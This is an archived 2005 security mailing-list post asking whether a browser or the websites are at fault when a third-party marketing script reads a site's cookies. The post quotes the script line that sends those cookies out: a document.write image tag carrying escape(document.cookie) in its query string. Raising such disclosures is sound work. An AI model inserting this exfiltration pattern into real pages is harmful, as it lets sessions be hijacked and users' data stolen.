lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  PHC 
Open Source and information security mailing list archives
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Thu, 12 May 2005 17:06:54 -0700
From: Tim Tompkins <>
Subject: cross-domain cookie theft: who's to blame?

Before disclosing the specifics, I'm just wondering wherein the fault lies:

I visited a site, say that loaded javascript from an 
external (marketing statistics) site, say  The script from read the cookies set by and posted them in a 
subsequent image tag as part of the query string.  Essentially, now has all of my cookies and could potentially 
hijack any cookie-based sessions I had going.

Is this a browser problem, allowing cross-domain scripts to read each 
other's cookies, or is this just blatant abuse by and/or

Example from
  <script language="javascript" src="">
  [ ... ]

Example of

document.write('<img src="' + 
escape(document.cookie) + '">');

Tim Tompkins

Powered by blists - more mailing lists